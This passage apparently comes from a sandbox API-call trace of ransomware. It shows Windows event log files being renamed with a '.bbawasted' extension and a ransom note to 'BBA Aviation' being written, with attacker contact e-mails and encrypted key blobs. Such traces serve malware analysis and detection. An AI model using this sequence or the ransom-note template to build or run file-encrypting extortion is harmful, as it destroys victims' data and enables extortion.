KEY:\r\n[begin_key]F2rb544xOIWNmNTxbLRHrinlh2KW26Qu0LbZMC4X1hV3wCnjKy7ggzVTK9y2jQoS\r\nJgIrFm02FBVgpAL3kcknViLaKQUK2sd2uDZ6wh4YGp3b5PpkrizMOqgYBnUdq+ow\r\nwg9pCFeDeO3elaHmiClF8HO+FG7aMq5LGhZKjtgJUqgrx6GB9lv7cSVYgbFc8j2Y\r\nBA+kVyBCtJkE5bTZ8eQFuIJqAU/T7ojUwymUcFD/rI1XzH1unrABBXIdrwQHV7yA\r\nsgdICPzyD/5O42ZBNc+gia2N9tqOabxg/oRLzWBhjoaPSL053BfXHXgs/SF+SEGc\r\nzjnR6Q00oDwL5A5P5nZ88UGLX7NzRF4uYgUwZ5pcrDvqVe2ZdRXSThrbk5rIkSgi\r\n1UWdp1jsh/4b/97YpKHea5jEF4raR2V0hL+pLM2Z9SGjtnlqTAGfkFs1O2SyDQom\r\nJpt2+QbcJDzMFnpAizRltA3sSXXKJmpYllx7SKZyPvZHZfseLqxgp2F8BbA20nSc\r\nElpq4YF+DWVI1O0PSSbv2pDbBILGHwGfyNmE/SuYTxo4mZCen8tUE4Lo+iMAqR2X\r\n1280rPtfkERWAlmhdZ8F7XcYqeCoGVG3UuqFPPwMQsx6fTaLTtAXhq4PE+BLA52Q\r\n7idZ8LgJsdwxmCstB6GtHBRcgDV5QivLU7S6Ux0KLYk=[end_key]\r\nKEEP IT\r\n") returned 984 [0183.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0183.071] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0183.071] SetEndOfFile (hFile=0x28c) returned 1 [0183.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.110] CloseHandle (hObject=0x28c) returned 1 [0183.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0183.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e948 | out: hHeap=0x660000) returned 1 [0183.117] _aulldvrm () returned 0x0 [0183.117] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0183.117] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0183.117] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0183.117] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 54 [0183.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0183.118] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0183.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0183.118] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a64e8) returned 1 [0183.119] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0183.119] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0183.119] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0183.119] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0183.121] SetEndOfFile (hFile=0x28c) returned 1 [0183.121] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.122] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0183.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.bbawasted")) returned 1 [0183.123] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0183.123] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0183.123] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0183.123] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0183.124] CloseHandle (hObject=0x294) returned 1 [0183.175] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0183.176] CloseHandle (hObject=0x280) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0183.176] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0183.177] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0183.177] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0183.177] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ac0) returned 1 [0183.178] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0183.178] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0183.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x69e580 [0183.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0183.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0183.189] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]T3IkVIbVWWpW+w9/XO4BDp6bGNkpbVyVXiWssjudxJMyc6ZKLgxOSFFd36V61oEl\r\nEkDGeYWHkx3gQdaUvL/uUnEWfdeJzgp2wqJCF7u8i80xqNZ0obPTvWgkI83fCL5d\r\n8y8oKQcLLiun74wf73MYN3mOZNZ3cC++SUI6hcfZ4lUWifguXmEf9ucOQh2erk2n\r\ndknG1q59a8RIN9ve3VQjFt2vzp5iokm4nWRxCw+Ub0In7TmEyM1CUpMTPhRn+KB3\r\nMC8NHGthN0a0XcWqslHbs7RriLBVATsz4qEBIbylKkHgOSxWvmz6ib5JInwkEShu\r\nXj9GSsXyjEmhte7Z96TIsnUtE4BW6WpePNpNkok0tDVWZxvYoulWaITchTz2oIgv\r\nJhFcLP5O3XvL9uxcjSykSDyBODapedLWcbaeTca+9PWmX4Af+CVdsZ9+Mp4tDx92\r\n/jBCy99dtr8oeXdJY8lqqUAV7oIUc9n1NrEC+SF0h1x5/EK0HAtMoEV3Oym5lbAT\r\n/woDMa9ht1xXCrp03Eerck8axPQYXzgmFnrfNDJS3feVq/dx+fsv8HSrxLTltYLk\r\nPzFWiQsfaA9yZxBcnlUnThkQeAHPmuz4Fa/PpOxgDfFOOoJyjuS0w6k//eykR4pv\r\neehR87jaJ27Kt2shw6P+G8mX2WSHhQBSjS8dQqlJnSd=[end_key]\r\nKEEP IT\r\n") returned 984 [0183.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e580 | out: hHeap=0x660000) returned 1 [0183.189] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0183.189] SetEndOfFile (hFile=0x28c) returned 1 [0183.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.192] CloseHandle (hObject=0x28c) returned 1 [0183.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0183.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69ea18 | out: hHeap=0x660000) returned 1 [0183.194] _aulldvrm () returned 0x0 [0183.194] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0183.195] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0183.195] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0183.195] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 60 [0183.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6aecf0 [0183.196] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0183.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0183.196] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6b48) returned 1 [0183.196] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0183.196] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0183.196] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0183.197] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0183.199] SetEndOfFile (hFile=0x28c) returned 1 [0183.199] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.199] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0183.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.bbawasted")) returned 1 [0183.337] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0183.337] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0183.337] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x111000 [0183.338] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x111000) returned 0x5480000 [0183.338] CloseHandle (hObject=0x280) returned 1 [0183.550] UnmapViewOfFile (lpBaseAddress=0x5480000) returned 1 [0183.762] CloseHandle (hObject=0x294) returned 1 [0183.762] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0183.762] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0183.763] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0183.763] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0183.763] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6d68) returned 1 [0183.764] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0183.764] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0183.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0183.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0183.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0183.776] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]C9cBaBe+Ng6K7bxO3w4PA4ycNFptOGpv9l76alUYxjPr0LXATir+j+q6xhOe2wdV\r\nBJZdoQjA7BdeCq83VhjAC3Q25oATzuW5DcxikykAtKPThj3df2OVLUpvcAi2isWP\r\nEJlDbibhOEtBr/yAe/0lS3pHBTgW192QecMcx0csYQQpqeFcbk8lR3zTay0tRuYA\r\nbS7iMS7ZK58n01g7I/4h2NA+dDIKtH78EC2VRRZqOuNfKvlwpgJ2YCHEMQfQp5km\r\nvd9GBjmrqCbM5XC8GojD9nAQI9Mb2CkRpUfsRVWIUUsTA0BGUR/0a/rTROxtMV0Q\r\ncCiA7CBsNfwpt5eJh5PvLLwDxW2T7B4l1oMtEJEXxKUKT8Ytn/1gHA0v1JW5vthH\r\nZUdLiDHPYwHokK17DMgCFEqP82wSy3xbNlqhciRp7QCoru+xSTI4q1FDINWwhGjs\r\nlR3cevK4ux05TiezBErONPuwiDihIcVEN4P3KMAPeeX/EEO4myEcB5DwPxv1V6Qe\r\ngRjrqMmGbAJ8clDaa4JMifylalw1b79O4hU8LnPOV5pOWE6qTH7JG26r2HWIRvhn\r\nYSC8EEdeoBKjuw90lv5YL9+t09ngNwTiwrBv3OKn5k3X1g6eKzje1DMBkfBDonu6\r\npRkP/1Cpy/v2ydl6LEKIyHZWIr/3Cof5FoFneb4tYnQ=[end_key]\r\nKEEP IT\r\n") returned 984 [0183.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0183.776] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0183.776] SetEndOfFile (hFile=0x28c) returned 1 [0183.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.779] CloseHandle (hObject=0x28c) returned 1 [0183.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0183.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x679f30 | out: hHeap=0x660000) returned 1 [0183.784] _aulldvrm () returned 0x0 [0183.785] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0183.785] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0183.785] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0183.785] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 62 [0183.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x286) returned 0x6aecf0 [0183.786] lstrcpyW (in: lpString1=0x6aed6c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0183.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0183.786] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a65f8) returned 1 [0183.786] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0183.786] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0183.786] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0183.788] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0183.790] SetEndOfFile (hFile=0x28c) returned 1 [0183.790] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.790] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.790] lstrcpyW (in: lpString1=0x6aed6c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0183.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.bbawasted")) returned 1 [0183.792] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0183.792] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0183.792] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0183.792] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0183.793] CloseHandle (hObject=0x294) returned 1 [0183.898] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0183.898] CloseHandle (hObject=0x280) returned 1 [0183.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0183.899] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6020) returned 1 [0183.899] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0183.899] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0183.899] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6a38) returned 1 [0183.900] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0183.900] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0183.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0183.910] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0183.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0183.911] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jLcymwtASq+zjYBznaogywwFylPim9zAnKBwpDU57xFxsq931+5zfI7bXy6rAF58\r\n00EjoUKGoxccjDn+mWyUa4tjkv4Oi1dMrO0EuWdVGaBnvCP8yW+MOxI9iYHDDCsC\r\nSp9SiKZchB/Vl0hTGMUAQPZAXtO19E2rF6s1bMUbZt9pVTVbWVLNnaumRBj2hMY0\r\n4S/FqTS20Ma4ff1kyGpRQnjpZyY3K3pPTZ7LODDhWgeQRb/iLpEDSCpfCpMv0opl\r\n4OhtWHNFxIdQUTsfdAPlcw8bME8oKv/jqGqEgWPpZrDWmkTxHllm72743e7mvGcT\r\nevK6BhYApNC1W2RFg9UAumZIqggOqhn5bOIRTbObUVqnF5SRwqLOLbtTil55gCYR\r\nTy21nWjXZx9F/OAEWZmze4hHzsp5Da8KKkFJRKsEApK50Z0cSVsGZg1mBtg/tHmW\r\n5lG2Oy469TTguV3Kdp/2NBEnQcJwDUtL7tCtYTEPTF9aibZ4DmmoRcj68oIEGpO7\r\nl/Mh1wQcjWDTWG75mKgS/lLYKWdKpmpSLuzvxa7svQHhIsTX1oOu2c+Xvf6tiYFz\r\ndWoLdCZZptTopPoueXYAocX5EMl8MeteR3g5/7REsygBFp/YEfhAfdC3gfoZgW6S\r\noPWlX1IjRcVxwU+AKx9crxtJ3PlOPBdNCSJoYePVcUb=[end_key]\r\nKEEP IT\r\n") returned 984 [0183.911] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0183.911] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0183.911] SetEndOfFile (hFile=0x28c) returned 1 [0183.914] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.914] CloseHandle (hObject=0x28c) returned 1 [0183.916] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0183.916] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x679d80 | out: hHeap=0x660000) returned 1 [0183.916] _aulldvrm () returned 0x0 [0183.916] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6130) returned 1 [0183.917] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0183.917] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0183.917] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 68 [0183.917] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x292) returned 0x6aecf0 [0183.917] lstrcpyW (in: lpString1=0x6aed78, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0183.917] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 